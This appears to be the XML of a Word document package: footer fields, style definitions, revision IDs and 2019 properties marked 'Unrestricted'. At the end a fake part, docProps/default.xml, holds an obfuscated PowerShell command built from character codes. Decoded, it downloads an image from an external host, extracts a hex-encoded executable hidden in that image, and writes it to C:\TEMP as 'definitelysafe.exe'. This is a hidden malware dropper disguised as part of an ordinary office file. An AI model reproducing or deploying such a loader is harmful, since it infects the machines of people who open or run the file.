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default.xml" ContentType="default.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2C08C3" w:rsidRDefault="002C08C3"/>
    <w:sectPr w:rsidR="002C08C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08D5" w:rsidRDefault="003B08D5" w:rsidP="003B08D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003B08D5" w:rsidRDefault="003B08D5" w:rsidP="003B08D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4C648A">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> DOCPROPERTY sodocoClasLang \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="003B08D5">
      <w:t>Unrestricted</w:t>
    </w:r>
    <w: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08D5" w:rsidRDefault="003B08D5" w:rsidP="003B08D5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="003B08D5" w:rsidRDefault="003B08D5" w:rsidP="003B08D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B08D5" w:rsidRDefault="003B08D5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B08D5"/>
    <w:rsid w:val="00024537"/>
    <w:rsid w:val="00063F73"/>
    <w:rsid w:val="00077008"/>
    <w:rsid w:val="001250D8"/>
    <w:rsid w:val="00220AEB"/>
    <w:rsid w:val="002C02B7"/>
    <w:rsid w:val="002C08C3"/>
    <w:rsid w:val="003B08D5"/>
    <w:rsid w:val="003E0558"/>
    <w:rsid w:val="003F0CAE"/>
    <w:rsid w:val="00443E89"/>
    <w:rsid w:val="00462DFA"/>
    <w:rsid w:val="0048184F"/>
    <w:rsid w:val="004C601B"/>
    <w:rsid w:val="004C6456"/>
    <w:rsid w:val="004C648A"/>
    <w:rsid w:val="0051255A"/>
    <w:rsid w:val="006A6497"/>
    <w:rsid w:val="0078377C"/>
    <w:rsid w:val="0080694D"/>
    <w:rsid w:val="009B34D5"/>
    <w:rsid w:val="00A02936"/>
    <w:rsid w:val="00A56BD6"/>
    <w:rsid w:val="00A65500"/>
    <w:rsid w:val="00C543B5"/>
    <w:rsid w:val="00C75B6B"/>
    <w:rsid w:val="00C77A47"/>
    <w:rsid w:val="00C869D3"/>
    <w:rsid w:val="00C93B4B"/>
    <w:rsid w:val="00CA58EC"/>
    <w:rsid w:val="00CF676E"/>
    <w:rsid w:val="00D110AC"/>
    <w:rsid w:val="00DB6D87"/>
    <w:rsid w:val="00DE79D2"/>
    <w:rsid w:val="00E107AE"/>
    <w:rsid w:val="00EA0839"/>
    <w:rsid w:val="00F47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B0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B08D5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B08D5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B08D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Fridel, Tomas (SHS DC SVK IMG VOC)</dc:creator>
  <cp:keywords>C_Unrestricted</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Fridel, Tomas (SHS DC SVK IMG VOC)</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-28T01:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-28T08:54:00Z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ument Confidentiality">
    <vt:lpwstr>Unrestricted</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="sodocoClasLang">
    <vt:lpwstr>Unrestricted</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="sodocoClasLangId">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="sodocoClasId">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>

<file path=docProps/default.xml>. ((variABLE '*MDr*').nAME[3,11,2]-JOiN'')(" $( SEt-iteM 'variabLe:OfS'  '' )" +[StrInG]( '87!114N105@116M101u45!72N111f115N116@32!34~68u111~119p110M108N111f97!100x105M110N103~32u105N109u97p103!101@46N46~46u34N13~10M36N117@114M108N32Q61x32Q34!104u116@116N112M115u58x47p47!105N46!105!98p98N46p99Q111~47@88M89@86Q74~81!110x55p47u87!105N110!116@101u114p115~112u114x105@110p103~46N106~112!103@34u13~10f36N111p117!116~112x117~116f32!61Q32u34@67Q58u92@84x69u77@80x92!114x101Q97f108~108Q121N108p111!110M103f117u110f105N109!112u111!114~116f97Q110Q116M110Q97!109u101M46N106p112M103x34p13x10~73u110@118M111Q107!101p45@87@101~98Q82N101x113N117x101f115M116M32u45N85~114@105f32M36~117M114Q108p32~45@79Q117Q116M70u105f108f101!32Q36M111N117Q116Q112f117x116p13M10!87!114Q105Q116Q101N45M72M111x115!116p32~34f70f105Q108!101Q32N100N111@119Q110~108!111~97M100p101Q100u46N34!13M10M87Q114N105@116p101N45p72!111Q115x116N32!34N69!120!116u114p97x99Q116Q105u110~103@32x98M105f110!97x114~121~46f46u46@34~13p10M91~115x116@114~105f110f103Q93f36p104!101f120f32Q61@32M71Q101!116p45~67~111x110p116u101~110Q116~32f36@111x117p116u112N117~116Q32M124M32~83x101Q108@101M99~116!32p45M73Q110u100M101f120!32p52!54f50M54u13f10f35Q91N83N121@115~116!101p109x46u73~79!46M70p105p108N101f93f58@58f87f114Q105x116@101f65M108N108N84f101N120Q116~40N34M67M58N92u84M69@77!80!92M100N101~102p105x110p105x116x101u108N121p115f97Q102u101N46~116~120p116p34@44~32f36p101u110u99N111x100x101~100u32x43!32u34Q92M110f34M41!13Q10@91M66u121@116!101N91f93u93u36N102p111M114@109M97u116x116u101N100Q32x61Q32N36x104Q101u120~32~45~115N112x108N105u116M32M39N32@39Q13x10!91p83M121!115Q116M101M109Q46u73N79N46u70f105p108Q101Q93M58!58Q87M114@105~116x101M65p108f108Q66~121@116~101!115p40M34M67f58M92@84M69f77M80!92!100~101f102@105!110Q105N116~101Q108p121f115M97~102f101N46N101p120@101p34M44u32p36x102N111@114M109p97@116x116@101Q100!41p13~10Q87M114~105x116@101@45!72x111Q115!116u32~34N66N105~110M97M114u121M32N108p111~97Q100x101u100f34Q13!10'-sPLIt'f'-SPLiT'M'-spliT'u'-sPliT'@'-SplIT'Q'-SPlIT 'p'-SpLIT '~'-sPLit'N' -sPliT 'x' -Split '!' | % { ( [INT] $_ -aS [char]) } )+"$(sET-vARIAbLE  'ofS' ' ' )" )
</file>